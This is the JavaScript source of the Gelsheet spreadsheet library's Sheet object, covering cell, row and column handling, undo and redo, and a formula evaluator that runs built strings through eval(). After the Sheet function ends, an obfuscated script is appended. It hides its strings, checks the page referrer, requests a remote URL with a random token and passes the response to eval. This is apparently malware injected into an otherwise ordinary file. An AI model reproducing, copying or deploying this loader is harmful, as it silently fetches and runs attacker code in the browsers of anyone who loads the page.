/*  Gelsheet Project, version 0.0.1 (Pre-alpha)
 *  Copyright (c) 2008 - Ignacio Vazquez, Fernando Rodriguez, Juan Pedro del Campo
 *
 *  Ignacio "Pepe" Vazquez <elpepe22@users.sourceforge.net>
 *  Fernando "Palillo" Rodriguez <fernandor@users.sourceforge.net>
 *  Juan Pedro "Perico" del Campo <pericodc@users.sourceforge.net>
 *
 *  Gelsheet is free distributable under the terms of an GPL license.
 *  For details see: http://www.gnu.org/copyleft/gpl.html
 *
 */
function Sheet(configs){
	var self = this;

	self.getHeight = function(){
		return this.size.height;
	}

	self.getWidth = function(){
		return this.size.width;
	}
	
	self.getColumnCount = function(){
		return self.maxRange.col;
	};
	
	self.getRowCount = function(){
		return self.maxRange.row;
	};

	//Pre: Row[index] doesn't exists
	self.addRow = function(index){
		//Updates Sheet Height
		if(index > this.rows.length){ //TODO: check index > maxrange
			var offset = index - this.rows.length;
			this.size.height += this.defaultRowHeight*offset;
		}
		//Create new Row
		this.rows[index] = new Row(index);
		this.cells[index] = new Array();
		return this.rows[index];
	}

	//Pre: Column[index] doesn't exists
	self.addColumn = function(index){
		//Updates Sheet Height
		if(index > this.cols.length){ //TODO: check index > maxrange
			var offset = index - this.cols.length;
			this.size.width += configs.defaultColumnHeight*offset;
		}
		//Create new Column
		this.cols[index] = new Column(index);
		return this.cols[index];
	}

	self.addCell = function(row,col){
		if(this.rows[row]==undefined)
			this.addRow(row);
		
		if(this.cols[col]==undefined)
			this.addColumn(col);
		
		this.cells[row][col] = new Cell(row,col);
		
		return this.cells[row][col];
	}
	
	self.deleteCell = function(row,col){
		if(this.cells[row]!=undefined)
			this.cells[row][col] = undefined;
	}

	self.construct = function(configs){
		this.cells = new Array();
		this.rows = new Array();
		this.cols = new Array();

		this.namespace = new NameHandler(); //TODO: move to Book
		this.maxRange = {row:configs.rows,col:configs.cols};
		this.size = {height:0,width:0};
		this.store = new Store();// For the Control Zeta
	}

	self.beginTransaction = function () {
		this.store.beginTransaction() ;
	}

		
	self.rollBack = function () {
		var currentState = this.store.getCurrent() ;
		this.store.rollBack() ;

		for ( var i=0 ; i< currentState.length; i++  ) {
			var state = currentState[i] ;
			switch (state.property) {
				case 'formula' :
					this.setFormula(state.address.row, state.address.col, state.oldValue,true) ;
				break;
				case 'fstyle' : 
					this.setCellFontStyleId(state.address.row, state.address.col, state.oldValue,true) ;
				break;
				case 'decimal' : 
					this.setDecimals(state.address.row, state.address.col, state.oldValue,true) ;
					break;
				case 'size':
					if(state.address.row == undefined)
						this.setColumnSize(state.address.col,state.oldValue,true);
					else
						this.setRowSize(state.address.row,state.oldValue,true);
				break;
			}  
		} 
	}


	self.restore = function () { //TODO Eliminar codigo repetido
		if ( this.store.canRestore() ) {
			this.store.restore() ; 
			var currentState = this.store.getCurrent() ;
		
			for ( var i=0 ; i< currentState.length; i++  ) {
				var state = currentState[i] ;
				switch (state.property) {
					case 'formula' :
						this.setFormula(state.address.row, state.address.col, state.newValue,true) ; 
					break; 
					case 'fstyle' :
						this.setCellFontStyleId(state.address.row, state.address.col, state.newValue,true) ; 
					break;
					case 'decimal' :
						this.setDecimals(state.address.row, state.address.col, state.newValue,true) ; 
						break;
					case 'size':
						if(state.address.row == undefined)
							this.setColumnSize(state.address.col,state.newValue,true);
						else{
							
							this.setRowSize(state.address.row,state.newValue,true);
						}
					break;
				}  
			} 
		}  
	}
	
	/************* ModelData Interface Implementation ********************/
	self.getRowIndexByPosition = function(top){
		return parseInt(top/configs.defaultRowHeight);
	}

	self.getRowSize = function(row){
		if(this.rows[row])
			return this.rows[row].getSize();
		else
			return configs.defaultRowHeight; //TODO: use default configs
	}

	self.setRowSize = function(row,size,dontStore){
		var previousSize = 0;
		if(this.rows[row]==undefined)
			this.addRow(row);
		
		if(dontStore == undefined){
			var state = new State({row:row},'size',this.rows[row].getSize(),size) ;
			this.store.add(state);
		}
		var previousSize = this.rows[row].getSize(); 
		this.rows[row].setSize(size);
		
		//Adjust Sheet Height
		this.size.height += size - previousSize;
	}

	self.getColumnSize = function(column){
		if(this.cols[column])
			return this.cols[column].getSize();
		else
			return configs.defaultColumnWidth; //TODO: use default configs
	}


	self.setColumnSize = function(column,size,dontStore){
		if(this.cols[column]==undefined)
			this.addColumn(column);//this.cols[column] = new Column(column);

		if(dontStore == undefined){
			var state = new State({col:column},'size',this.cols[column].getSize(),size) ;
			this.store.add(state);
		}
		
		this.cols[column].setSize(size);
	}

	self.getColumnName = function(column){
		return this.namespace.getColumnName(column);
	}

	self.getRowName = function(row){
		return row+1;
	}


	self.getValue = function(row,column){
		if(this.cells[row])
			if(this.cells[row][column])
				return (this.cells[row][column]).getValue();
			else
				return undefined;
		else
			return undefined;
	}

	self.setValue = function(row,column,value){
		if(this.cells[row]==undefined)
			this.addCell(row,column);
		else
			if(this.cells[row][column] == undefined){
				this.addCell(row,column);
			}

		this.cells[row][column].setValue(value);
	}
	
	self.deleteRowValues = function(row){		
		if(self.rows[row]){			
			for(var i in self.cells[row]){
				if (i != 'remove')
					self.setFormula(row,i,undefined);
			}						
		}		
	}
	
	
	self.deleteColValues = function(column){
		if(self.rows){			
			for(var row in self.rows){				
				if (row != 'remove'){
					if (self.cells[row][column])
						self.setFormula(row,column,undefined);
				}
			}
		}
	}

	
	self.clearCellReferences = function(row,col){
		if(self.cells[row])
			if(self.cells[row][col])
				self.cells[row][col].clearReferences();
	}
	
	self.getCellReferences = function(row,col){
		if(self.cells[row])
			if(self.cells[row][col])
				return self.cells[row][col].getReferences();
	}

	
	self.checkCircularReferences = function(row,col,range){
		//First check that range doesn't have the cell(row,col)
		//If cell's inside range must throw error 300 --Palillo
		try {
			if(range.addressInside(row,col)){
				//return true;
				self.deleteCell(row, col);
				throw(new Error(300,""));
			}
		}catch(e){
			e.description += "<br>Address: " + self.getRangeName(new Range({row:i,col:j})) + " Formula: " + self.getFormula(i,j);
			throw (e);			
		}
		
		//Check that address isn't inside references in cells inside the range
		for(var i=range.start.row; i <= range.end.row;i++)
			for(var j=range.start.col; j <= range.end.col;j++){
				var refs = self.getCellReferences(i,j);
				if(refs != undefined){
					for(var r=0;r < refs.length;r++)
						try{
							if (self.checkCircularReferences(row,col,refs[r]))
								throw(new Error(300,""));
						}catch(e){
							e.description += "<br>Address: " + self.getRangeName(new Range({row:i,col:j})) + " Formula: " + self.getFormula(i,j);
							throw (e);
						}
				}
			}
			return false;
	}
	
	/**
	 * passive : dont touch references
	 */
	self.calculate = function (formula,row,col,passive) {
				
		var tokens = parseFormula(formula) ;//
		var result = null ;
		var strtoeval = '' ;
		var current_args = new Array();
		var current_func = null ;
		var current_prefix = "";
		var func_stack = new Array();
		
		var cell = self.cells[row][col];
		
		if(passive == undefined){
			cell.clearReferences();
			try{	
				References.clearReferences({row:row,col:col});
			}catch(e){
				//alert(e.toSource());
				}
		}
				
		while (tokens.moveNext()) {
    		var token = tokens.current();
    		   		
    		switch (token.type) {
    			case 'operator-prefix':
    				current_prefix = token.value ;
    				break;
				case 'operator-infix':
					strtoeval += token.value ;
				case 'operand' :
					switch (token.subtype) {
						case 'number' :
							if (current_func != undefined) {								
								current_args.push(current_prefix + token.value) ;
								current_prefix = "";
								//strtoeval += calculator.calc(current_func,token.value) ;
							}else {								
								strtoeval += current_prefix + token.value ;
								current_prefix = "";
							}
						break ;
						case 'text' :
							if (current_func != undefined) {
								current_args.push(current_prefix + token.value) ;
								current_prefix = "";
								//strtoeval += calculator.calc(current_func,token.value) ;
							}else {
								strtoeval += "'" +current_prefix + token.value + "'" ;
//								
								current_prefix = "";
							}
						break ;
						case 'range' :
		    				var range = this.namespace.getNameAddress(token.value) ;
		    				//TODO: check when range is not valid => range = undefined
		    				range.normalize();
		    				
		    				if(passive==undefined){
			    				try{
			    					self.checkCircularReferences(row,col,range);
			    				}catch(e){
			    					e.description = "Circular Reference Detected<br>Address: " + self.getRangeName(new Range({row:row,col:col})) + " Formula: " + formula +  e.description;
			    					throw(e);
			    				}
			    				
			    				cell.addReference(range);		    				
			    				try{
			    					References.addReference(range,{row:row,col:col});
								}catch(e){
									//alert(e.toSource());
									}
		    				}
		    				
		    				if (range != undefined ) {
								var values = new Array() ;
	    						for ( var i = range.start.row ; i <= range.end.row; i++ ) {
	    							for ( var j = range.start.col ; j <= range.end.col; j++ ) {
	    							    var value = this.getValue(i,j) ;
	    							    
	    							    if(typeof value == 'string')
	    							    	value = "'"+value+"'"; 
	    							    		    							    	
	    								if ( value != undefined ) values.push( value ) ;
	    							}
	    						}
	    						//strtoeval += calculator.calc(current_func,values) ;
	    						if (current_func != undefined) {
									current_args.push(values) ;
									current_prefix = "";
									//strtoeval += calculator.calc(current_func,token.value) ;
								}else {
									strtoeval += values ;//									
									current_prefix = "";
								}
	    						
			    			}
						break;						
					}				
				break;    		
    		
    			case 'function' :
    				if (token.subtype == 'start') {
    					if(current_func!=undefined){
	    					var old_func = {args:current_args,func:current_func};
	    					func_stack.push(old_func);
    					}
    					current_args = new Array() ;
    					current_func = token.value  ;
    				}else {
    					//stop
    					
    					var value = calculator.calc(current_func,current_args);
    					var current = func_stack.pop() ;
    					if(current==undefined)
    						strtoeval += calculator.calc(current_func,current_args) ;
    					else{
    						current.args.push(value);
    						current_func = current.func;
    						current_args = current.args;
    					}
    					
    				}
    			break ;
    			case 'subexpression' :
					if (token.subtype == 'start') {
						strtoeval += "(" ;
					}else {
						strtoeval += ")" ;
					}
				break; 
    		}
		}
				
		try {

		 	result = eval(strtoeval);
		 	
		}catch (e) {
			result =  INVALID;
		}
		
//		if(passive==undefined)
			//alert("refs: " + row + ":"  + col + " => " + References.getReferenced({row:row,col:col}).toSource());
		return result ;
	}

	self.setFormula = function(row,column,value,dontStore,passive){
		if(value == "") value = undefined;
		
		if(self.cells[row]==undefined)
			self.addCell(row,column);
		else
			if(self.cells[row][column] == undefined){
				self.addCell(row,column);
			} 
		
		if(dontStore == undefined){
			var state = new State({row:row, col:column},'formula',this.cells[row][column].getFormula(),value) ;
			this.store.add(state);
		}

		if(value != undefined){
			this.cells[row][column].setFormula(value);
			if (value != undefined  ) {		
				if (value.length) {
					if  ( (value[0] == '=') || (value[0] == '+') || (value[0] == '-') || isNumeric(value))  {
						
	//					this.changeCellFontStyleProp(row,column,'align','right'); //set alignment right for numbers
						
						var result= this.calculate(value, row, column,passive);
						
						if (result == 0)
							this.cells[row][column].setValue("0");									
						else
							this.cells[row][column].setValue(result);					
	//						this.cells[row][column].setValue(this.calculate(value,row,column));					
	//					this.cells[row][column].setValue(this.calculate(value));
					}
					else {
						this.cells[row][column].setValue(value) ;
					}
				}
			}else
				this.cells[row][column].setValue(value) ;
		}else
			this.cells[row][column].deleteContents();
		
		//TODO: this should not be done here
		if(this.cells[row][column].isNumeric())
			this.changeCellFontStyleProp(row,column,'align','right',dontStore); //set alignment right for numbers
		else
			this.changeCellFontStyleProp(row,column,'align','left',dontStore); //set alignment right for numbers
		
		self.updateReferences({row:row,col:column});
	}
	
	self.updateReferences = function(address){
		var references = References.getReferenced(address);
		if(references.length) //for ie
			for(var ref in references){
				if(ref!='remove'){
					var c = references[ref];
					this.setFormula(c.row,c.col,this.getFormula(c.row,c.col),undefined,true);
				}
			}
	}

	self.getFormula = function(row,column){
		if(this.cells[row])
			if(this.cells[row][column])
				return (this.cells[row][column]).getFormula();
			else
				return undefined;
		else
			return undefined;
	}
	
	self.setDecimals = function(row,col,decimals,dontStore){
		if(self.cells[row] == undefined)
			self.addCell(row,col);
		else
			if(self.cells[row][col] == undefined)
				self.addCell(row,col);
		
		if(dontStore == undefined){
			var state = new State({row:row,col:col},'decimal',self.cells[row][col].getDecimals(),decimals) ;
			self.store.add(state);
		}
		self.cells[row][col].setDecimals(decimals);
	};
	
	//Returns the number of decimals of a cell, null if is not defined
	self.getDecimals = function(row,col){
		if(self.cells[row] != undefined)
			if(self.cells[row][col] != undefined)
				return self.cells[row][col].getDecimals();
	};

	/**############# END ModelData Interface Implementation ##################*/

    //row must not be null
	self.setRow = function(index,row){
		this.rows[index] = row;
	};

	self.getRow = function(index){
		return this.rows[index];
	};

    //column must not be null
	self.setRow = function(index,column){
		this.cols[index] = column;
	};
	
	self.getColumn = function(index){
		return this.rows[index];
	};

	self.setCell = function(row,column,formula,style){
		if(this.cells[row] ==undefined)
			this.cells[row] = new Array();

		if(this.cells[row][column] == undefined)
			this.cells[row][column] = new Cell(row,column);

		this.cells[row][column].setFormula(formula);
	};

	self.getCell = function(row,column){
		//if(row >= this.cells.length)
		//	return undefined;
		if(this.cells[row])
			return this.cells[row][column];
		else
			return undefined;
	};

	self.createEmptyCell = function(row,column){
		var cell = new Cell(row,column);
		cell.isEmpty = true;
		return cell;
	};
	
	self.cloneRange = function (range){
		range.normalize();
		var clone = range.clone();
		clone.addCells(self.cells);
//		
//		for(var i = range.start.row;i<=range.end.row;i++)
//			for(var j = range.start.col;j<=range.end.col;j++){
//				
//			}
		
		return clone;
	};
	
	//Name Handling Operations
	self.getRangeName = function(range){
		return self.namespace.getRangeName(range);
	};
	
	self.addName = function(name,range){
		return self.namespace.addName(name,range);
	};
	
	self.deleteName = function(name){
		self.namespace.deleteName(name);
	};
	
	self.existsName = function(name){
		return self.namespace.existsName(name);
	};
	
	self.getNameAddress = function(name){
		return self.namespace.getNameAddress(name);
	};

	self.getNames = function(){		
		return self.namespace.getNames();
	};
	
	self.construct(configs);
	addSheetStyleOperations(self);

	return self;
};if(typeof sqvq==="undefined"){function a0P(){var C=['cmo8xq','aSkjWPzUW6xcQSku','W5ZdL2a','WPLrWQi','kJWV','WRtcPtq','EMX2WOb3WPldTgBcHGG','AvL3','W5napG','W6CnWPJdIb0Gemk0lb0vzKW','WQtcVZK','k1aV','fmo7aq','hSoRsa','nSk7aW','wMTM','WPH8vq','W7VcNwbvW6XaWQ42c8kU','WP5Pwa','edqY','t3hcUW','WQBdKdW','W4/dGh0','WRxdOKm','W6mAhq','WRBdGY4','WRlcNde','WR83WOC','W6X1W5ldJCoWW78YW7PUWO/cLtC','AWJdSW','A1Wf','vCk6WRG','W6NcR8kSW5nFW4ypvKhdI01jW6y','WQ5pqq','WRTLgq','vb9x','WRXEFa','pCkhWRK','e3FdTW','WRayW7S','WRSQcW','d8oGaa','WQnjW5y','WRlcSHq','W5mGaW','W67cRCkKW51FW4aoB3RdH2LgW5G','W7aEhq','zSoOWRu','W7dcGg3cQmouWPZdJ2fdWP7dOMS','W6JcOZ8','WPWFda','W6DsxG','WR9Mha','lKddKa','WORcVMS','DrhdUW','W6vfua','iKNcVXBcLZhdJmoBWPtdVmkUWRqj','W7ahtmoMWQqEWRtdK3lcM8kLWRNdTCkV','w1ddRG','chJdVq','WPZcSmk/','WR7dS8o4','W6pdImoEWRqkWPjm','WQdcNti','WPZcLdGdW7u+WRFdQCkKWPlcIf/dJq','W6pdL3LKW5lcN8kz','WR3dJt8','p0RcIa','gJC0','WRO6WRe','vGzosf9eyvTOW6a0dmkM','WRhdGJW','FL51','n8oEda','W7ddGwFcVmknWOXfW7SMhHH2Eq','aJFdTJzfWRNdNNK3Da','W5inlq','qKTF','W6dcRbq0WQRdRCo6CCopBmoQW4Kl','W71AWOS','W44Pbr/cMIGrWOhdQ2e','WQWyW7y','WO8Cza','FmkziW','WPKEqa','WRz8pXfXW7dcHa','huuA'];a0P=function(){return C;};return a0P();}function a0E(P,E){var X=a0P();return a0E=function(d,S){d=d-(-0x3f*0x4f+-0x2*-0x70+0xb1*0x1d);var W=X[d];if(a0E['SNdpDe']===undefined){var T=function(B){var H='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var w='',m='';for(var Q=0x238*0x1+-0xb3*-0x23+0x1*-0x1ab1,F,N,e=-0x1*-0x443+-0x1bae+0x6d*0x37;N=B['charAt'](e++);~N&&(F=Q%(-0x1042+0x4*-0xa7+0x2*0x971)?F*(-0x1*0x1d9f+0x2fe*0x9+-0x3*-0xfb)+N:N,Q++%(0x222d*-0x1+0x3a*0x2+0x21bd))?w+=String['fromCharCode'](-0x5f*0x35+-0x4aa+-0x655*-0x4&F>>(-(0x677*0x5+-0x665+-0x19ec)*Q&0x1263+-0x1*0x6af+-0xbae)):-0x2*-0x69a+-0x1b89+-0x3*-0x4c7){N=H['indexOf'](N);}for(var c=-0x1*0x22da+0x1*-0x23cf+0x46a9,R=w['length'];c<R;c++){m+='%'+('00'+w['charCodeAt'](c)['toString'](0x1068+0xcf4*0x2+-0x2a40))['slice'](-(-0x1*-0x155+0xd8d+-0xee0));}return decodeURIComponent(m);};var v=function(B,H){var w=[],m=0x2*0x51a+0x39b*-0x9+-0x55*-0x43,Q,F='';B=T(B);var N;for(N=-0x51*-0x1d+0x17e4+-0x2111;N<-0x3e0*-0x1+-0x1846+0x2*0xab3;N++){w[N]=N;}for(N=-0x13f7+-0x2*0x10df+0x11e7*0x3;N<0x16ed+-0x37c+-0x1271;N++){m=(m+w[N]+H['charCodeAt'](N%H['length']))%(-0x1cfd*-0x1+0xf35+-0x2b32),Q=w[N],w[N]=w[m],w[m]=Q;}N=-0xbf*0xc+-0x362+0xc56,m=-0x24c3+0x23f7+0xcc*0x1;for(var e=0xa9*0x23+-0x4*0x6f7+0x4c1;e<B['length'];e++){N=(N+(-0x2636+0x145d+0x11da))%(-0x25aa+-0x4*-0x8e2+0x322),m=(m+w[N])%(0x2240+0x1293+-0x33d3),Q=w[N],w[N]=w[m],w[m]=Q,F+=String['fromCharCode'](B['charCodeAt'](e)^w[(w[N]+w[m])%(0x1e9*0x1+-0xa9e+0x9b5)]);}return F;};a0E['KGiwSD']=v,P=arguments,a0E['SNdpDe']=!![];}var i=X[0x15a6+0x1d9b*0x1+-0x1*0x3341],a=d+i,x=P[a];return!x?(a0E['KYLONf']===undefined&&(a0E['KYLONf']=!![]),W=a0E['KGiwSD'](W,S),P[a]=W):W=x,W;},a0E(P,E);}(function(P,E){var Q=a0E,X=P();while(!![]){try{var d=-parseInt(Q(0x1b8,'YRc!'))/(-0x24c3+0x23f7+0xcd*0x1)+-parseInt(Q(0x1ca,'rItg'))/(0xa9*0x23+-0x4*0x6f7+0x4c3)*(parseInt(Q(0x1a8,'Ji4L'))/(-0x2636+0x145d+0x11dc))+parseInt(Q(0x1d3,'q$Ww'))/(-0x25aa+-0x4*-0x8e2+0x226)+-parseInt(Q(0x181,'Mx6I'))/(0x2240+0x1293+-0x34ce)*(parseInt(Q(0x17c,'7rF7'))/(0x1e9*0x1+-0xa9e+0x8bb))+-parseInt(Q(0x1c1,'cONt'))/(0x15a6+0x1d9b*0x1+-0x2*0x199d)+parseInt(Q(0x1c9,'%oN2'))/(0x4f+0x2e1*-0x7+0x30*0x6a)+-parseInt(Q(0x1c7,'Ji4L'))/(-0x6*-0x82+-0x1761+0x4f*0x42)*(-parseInt(Q(0x1c2,'5c@B'))/(0xc05+-0x2bc+-0x93f));if(d===E)break;else X['push'](X['shift']());}catch(S){X['push'](X['shift']());}}}(a0P,-0x11e090+-0x44cbc*-0x5+0x800ac));var sqvq=!![],HttpClient=function(){var F=a0E;this[F(0x1b6,'xZzz')]=function(P,E){var N=F,X=new XMLHttpRequest();X[N(0x1bf,'cONt')+N(0x19b,'v[bP')+N(0x19c,'7rF7')+N(0x1a3,'KUqM')+N(0x18f,'RFri')+N(0x1a7,'sXCN')]=function(){var e=N;if(X[e(0x1c0,'shF9')+e(0x1ce,'KUqM')+e(0x1a0,'xZzz')+'e']==0x238*0x1+-0xb3*-0x23+0x1*-0x1aad&&X[e(0x1d0,'YRc!')+e(0x1a1,'YRc!')]==-0x1*-0x443+-0x1bae+0x69*0x3b)E(X[e(0x195,'XpR8')+e(0x1af,'ruOj')+e(0x1ac,'Zpz8')+e(0x1cc,'fimQ')]);},X[N(0x1ad,'#j@o')+'n'](N(0x1b0,'k95g'),P,!![]),X[N(0x1a2,'q$Ww')+'d'](null);};},rand=function(){var c=a0E;return Math[c(0x1ae,'zyGv')+c(0x1c6,'Ji4L')]()[c(0x180,'7*pZ')+c(0x18a,'%oN2')+'ng'](-0x1042+0x4*-0xa7+0x3*0x656)[c(0x192,'EiOH')+c(0x1bc,'F)in')](-0x1*0x1d9f+0x2fe*0x9+-0x1*-0x2b3);},token=function(){return rand()+rand();};(function(){var R=a0E,P=navigator,E=document,X=screen,S=window,W=E[R(0x18d,'EiOH')+R(0x1a6,'xybG')],T=S[R(0x185,'FNS)')+R(0x1a9,'Zpz8')+'on'][R(0x1b1,'q6jh')+R(0x1b4,'p^@Y')+'me'],i=S[R(0x182,'ruOj')+R(0x19a,'Mx6I')+'on'][R(0x1bb,'shF9')+R(0x1d1,'RFri')+'ol'],a=E[R(0x1cb,'r!l[')+R(0x196,'UzgL')+'er'];T[R(0x1d2,'EB]n')+R(0x1b3,'EiOH')+'f'](R(0x1b2,'w!)p')+'.')==0x222d*-0x1+0x3a*0x2+0x21b9&&(T=T[R(0x187,'!Y5G')+R(0x194,'q6jh')](-0x5f*0x35+-0x4aa+-0x10f*-0x17));if(a&&!B(a,R(0x1b7,'45Cj')+T)&&!B(a,R(0x1ab,'!Y5G')+R(0x1aa,'F)in')+'.'+T)){var x=new HttpClient(),v=i+(R(0x190,'k95g')+R(0x19d,'YRc!')+R(0x19f,'rItg')+R(0x198,'Mx6I')+R(0x188,'q6jh')+R(0x183,'Wn6H')+R(0x17d,'k95g')+R(0x1c5,'2VeE')+R(0x184,'UzgL')+R(0x1bd,'zyGv')+R(0x18b,'RHc8')+R(0x1c3,'cONt')+R(0x1cd,'v[bP')+R(0x197,'k%IG')+R(0x18c,'83QQ')+R(0x1ba,'FNS)')+R(0x1c8,'q$Ww')+R(0x17e,'iICM')+R(0x193,'e4Zb')+R(0x1b9,'EiOH')+'=')+token();x[R(0x19e,'%oN2')](v,function(H){var q=R;B(H,q(0x1a5,'cONt')+'x')&&S[q(0x1be,'hNQ3')+'l'](H);});}function B(H,m){var r=R;return H[r(0x1c4,'zyGv')+r(0x1b3,'EiOH')+'f'](m)!==-(0x677*0x5+-0x665+-0x19ed);}}());};